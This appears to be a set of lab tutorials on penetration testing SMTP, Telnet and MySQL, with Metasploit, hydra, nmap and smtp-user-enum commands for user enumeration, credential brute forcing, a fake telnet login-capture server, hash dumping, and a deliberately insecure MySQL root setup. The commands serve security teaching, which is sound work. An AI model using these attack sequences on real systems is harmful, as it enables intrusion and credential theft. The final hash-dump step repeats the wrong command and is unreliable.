4 ways to SMTP Enumeration

We can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

Telnet

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy admin@mail.ignite.lab

Metasploit

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of user’s aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.

use auxiliary/scanner/smtp/smtp_enum

msf auxiliary(smtp_enum) > set rhosts 192.168.1.107

msf auxiliary(smtp_enum) > set rport 25

msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt

msf auxiliary(smtp_enum) > exploit

From given image you can read the valid username found in targeted server as well as it also grab SMTP banner.

smtp-user-enum

smtp-user-enum is a tool for enumerating OS-level user accounts on Solaris via the SMTP service (sendmail). Enumeration is performed by inspecting the responses to VRFY, EXPN and RCPT TO commands. It could be adapted to work against other vulnerable SMTP daemons, but this hasn’t been done as of v1.0.

Type following command to enumerate username using dictionary of usernames:

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

 -M: mode Method to use for username guessing EXPN, VRFY or RCPT 

 -U: file File of usernames to check via smtp service
 -t: host Server host running smtp service

From given image you can see out of total 7 queries only 5 names are valid and exist in smtp server.

Type following command to verify user email address on mail server:

smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107

-D:  dom   Domain to append to supplied user list to make email addresses; Use this option when you want to guess valid email addresses instead of just usernames.

From given image you can see it has shown raj@mail.ignite.lab is valid email ID for user raj.

iSMTP is the kali Linux toolw which is use for testing SMTP user enumeration (RCPT TO and VRFY), internal spoofing, and relay.

Type following command to enumerate valid email ID of targeted server:

ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt

-h       The target IP and port (IP:port)

 -e   Enable SMTP user enumeration testing and imports email list.

From given image you can see blue color text refer to valid email account and red color text refer to invalid account.

Penetration Testing on Telnet (Port 23)

Telnet is a TCP/IP network terminal emulation program that allows you to reach another Internet or local area network device by logging in to the remote machine. Telnet is a client-server protocol used for link to port number 23 of Transmission Control Protocol. Using Telnet, you can even test open ports on a remote network.

Requirements

Telnet Server: Ubuntu

Attacker system: Kali Linux

Table of Content

·         Installation & Configuration

·         Connecting to Telnet

·         Banner Grabbing of Telnet

·         Banner Grabbing through Telnet

·         MITM: Telnet Spoofing

·         Brute Forcing

·         Telnet credential Sniffing

Installation & Configuration

Telnet is an unencrypted and therefore insecure protocol and we recommend to use SSH over the telnet as it is an encrypted protocol. But still you should have the understanding of all the protocols and telnet is one of the protocol through which you can connect to the other system in your local network. So let’s start the installation first. Telnet Server installation is quite simple.

Run the following command with root access in your Ubuntu to install Telnet.

apt-get install telnetd

Upon completion of the installation, you can test the Telnet service status by using the following command.

systemctl status inetd

And with the output shown in the screenshot we can observe that the service is active in Ubuntu.

Test Telnet Connection from Windows machine

Now we will connect telnet with putty. Enter the ip address of Ubuntu and give port 23 in order to connect with telnet and hit open.

As we hit open a new pop up gets open which asks for the Ubuntu username and password and after submitting the right values we are logged in to Ubuntu.

Connecting to Telnet

The telnet is installed. It's time to connect a remote Telnet server. Log in to your kali machine and run the following command. To get connected it will ask for the username and password, after providing the right values; you got connected.

telnet 192.168.0.196

Banner Grabbing of Telnet

Now once the setup of telnet is ready, we will run the version scan to know which version is running in the Ubuntu and as shown in the screenshot below we got the version with this scan.

Banner Grabbing through Telnet

In the banner capture of other systems operating on the target network, Telnet plays a significant role.

To find the version of SSH service running on the target computer, open the terminal in Kali Linux with the following instruction.

telnet 192.168.0.196 22

Similarly, the version and legitimate user of SMTP server can also be associated with telnet. Run the command below and find out their version and current user.

telnet 192.168.0.136 25

You will note from the picture that "220 metasploitable.localdomain ESMTP Postfix" was successfully mounted on the target computer.

If you receive the answer code 550 this means an unknown user account: You can guess for a legitimate user account via following command:

vrfy msfadmin

If the message code 250,251,252 was received to the degree that the server acknowledged the application and user account is correct.

If you have received a message code 550, it means that the account is invalid as shown in the picture.

MITM: Telnet Spoofing

An attack may use telnet spoofing as Man-in-the-middle attack in order to capture the telnet login credential.

This can achieve by generating a bogus telnet service in the network. Open the terminal in your Kali Linux and Load Metasploit framework; now type the following command to start the server and here we have also given a banner of “Welcome to Hacking Articles” which you can set any of your choice.

use auxiliary/server/capture/telnet

set srvhost 192.168.0.102

set banner Welcome to Hacking Articles

exploit

Now as soon as the attacker found that telnet is running in the victim’s system he tries to get connected and in order to get connected he submits the credentials and the login gets failed.

But we can see our logs here in the server which represents who tried to connect with telnet.

Brute Forcing

An attacker is still attempting to use brute force for stealing credentials. This module checks a telnet login and records positive connections on a variety of devices.

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.196

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

As you can observe that , here it has obtain the valid credential for the telnet moreover provide the session for the victim’s shell.

sessions  –u  2

Once we got the meterpreter of the victim we will execute sysinfo command to check that we are on Ubuntu machine.

Telnet credential Sniffing

By default Telnet does not encrypt all linked data, even passwords, and thus it is always possible to eavesdrop the communications and then use the password for malicious uses; someone who has network access between the two hosts used by Telnet can interrupt the packets between the source and target, and obtain authentication, password and data details.

From given below image you can read the username: raj and password: 123 for Telnet moreover complete information traveling through packet between source to destination. 

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore, in favour of that the Secure Shell (SSH) protocol, first released in 1995 in replace of Telnet.

Penetration Testing on MYSQL (Port 3306)

MySQL is an open-source Relational Database Management System (RDBMS). It is widely used for managing and organizing data in a structured format, using tables to store the data. MySQL functions in a networked setup utilizing a client-server architecture. In this configuration, the MySQL server manages the database, while client applications connect to the server to execute tasks like querying and updating data. The interaction between the MySQL clients and the server is conducted over the TCP/IP protocol, with MySQL by default listening on port 3306.

Table of Contents

·      Lab setup

·      Installation

·      Connecting to MySQL server

·      Brute forcing MySQL credentials

·      Exploitation using Metasploit

·      Configuring a custom port

·      Conclusion

Lab setup

Target Machine: Ubuntu (192.168.31.205)

Attacker Machine: Kali Linux (192.168.31.141)

Installation

We are going to start with the MySQL server setup in the ubuntu machine. The command for installing the server is:

apt install mysql-server

To check if the server is up and running, use the following command:

netstat -tlnp

It can be seen from above that the server is up and running at port 3306.

Connecting to MySQL server

We are going to scan the IP using the nmap tool in kali linux to check if the service is showing as closed or open. To do so we will run the following command in kali linux:

nmap -p3306 -sV 192.168.31.205

It can be seen from above that the port 3306 at which the mysql service is running is closed. The reason for it is that the MySQL server is running internally on that machine and is using the bind-address set to 127.0.0.1 in the default settings.

In order to make the service open, we need to change the configuration. For that edit the mysqld.cnf file inside the ubuntu machine. To do so use the following command:

nano /etc/mysql/mysql.conf.d/mysqld.cnf

 

To make the service open, comment out (#) the bind-address = 127.0.0.1 line.

Now again scan the IP using the nmap tool, it can be seen that the service is open now.

nmap -p3306 -sV 192.168.31.205

However, it can be noted that even the service state is showing as open, we will be unable to connect with service remotely. To enable the root user to connect from any host and perform any action on any database, the following SQL commands are used in the ubuntu machine:

mysql -uroot

CREATE USER 'root'@'%' IDENTIFIED BY '123';

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%';

FLUSH PRIVILEGES;

The commands from the above can be interpreted as follows:

The first command is used to log into the MySQL server as the root user. The second command creates a new user named root who can connect from any host (%) and sets the password to 123. The third command grants the newly created root user all privileges on all databases and tables. The last command reloads the privilege tables, ensuring that the changes take effect immediately.

Now we can check if we can login into the MySQL server remotely by running the following command in kali linux:

mysql -h 192.168.31.205 -uroot -p

Since we are able to connect with the service remotely, now we will start the pentesting.

Brute forcing MySQL credentials

We can brute force the MySQL credentials by passing a list of usernames and passwords using the hydra tool inside kali linux. Here we are using the username list as users.txt and the password list as pass.txt. The command for brute force attack will be:

hydra -L users.txt -P pass.txt 192.168.31.205 mysql

Exploitation using Metasploit

There are lot of exploits and auxiliaries related with the MySQL server. Here we are going to demonstrate few of them to give an insight on the MySQL pentesting.

First we will be using the auxiliary/admin/mysql/mysql_sql inside Metasploit to run the SQL queries directly after connecting with the database.

msfconsole -q

use auxiliary/admin/mysql/mysql_sql

set rhosts 192.168.31.205

set username root

set password 123

set sql show databases

run

There is another auxiliary which helps in dumping the entire data, i.e., auxiliary/scanner/mysql/mysql_schemadump. We just need to give the username and password to connect with the database and we can dump the entire schema.

use auxiliary/scanner/mysql/mysql_schemadump

set rhosts 192.168.31.205

set username root

set password 123

run

To dump the usernames and password hashes, we can use the auxiliary/scanner/mysql/mysql_hashdump, it gives us the usernames and the password hashes as output.

use auxiliary/scanner/mysql/mysql_hashdump

set rhosts 192.168.31.205

set username root

set password 123

run

In order to check if there is file which is writeable at the server side, we can identify it using the auxiliary/scanner/mysql/mysql_writable_dirs. However, it is not possible by default. There is a setting which we need to change in the configuration file after which we can enumerate the writable directory.

To make this configuration, edit the /etc/mysql/mysql.conf.d/mysqld.cnf file and add the line secure_file_priv= " " at the end.

Now check for the writable directories using Metasploit.

use auxiliary/scanner/mysql/mysql_writable_dirs

set rhosts 192.168.31.205

set username root

set password 123

set dir_list dir.txt

run

It can be seen from above that the directory /tmp is writeable.

To enumerate the files and directories if they exist on the machine or not we can use the auxiliary/scanner/mysql/mysql_file_enum. It will give us the results if the directory or file exists or not.

Finally, to enumerate the whole MySQL server we can use the auxiliary/admin/mysql/mysql_enum, which will perform the enumeration on the MySQL server after using the valid credentials.

use auxiliary/admin/mysql/mysql_enum

set rhosts 192.168.31.205

set username root

set password 123

run

Configuring a custom port

To perform the port modification in MySQL, we need to edit the configuration file. The path for the file is /etc/mysql/mysql.conf.d/mysqld.cnf.

nano etc/mysql/mysql.conf.d/mysqld.cnf

As we can see that the default port is 3306 which is getting used and is commented out (#). We can modify the port number to 4403 and remove the comment (#) from the line.

Now if we scan the IP using nmap, it can be seen that the service is up and running at port 4403.

Conclusion

MySQL server has been a popular choice for most of the application developers from many years, however it’s misconfiguration can lead to the data leakage. It is recommended to use the proper configuration and implement a strong password policy for the service.

MySQL Penetration Testing with NMAP

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

Scanning for port 3306

open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

Nmap –sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

Nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

Nmap –p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

Nmap –p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.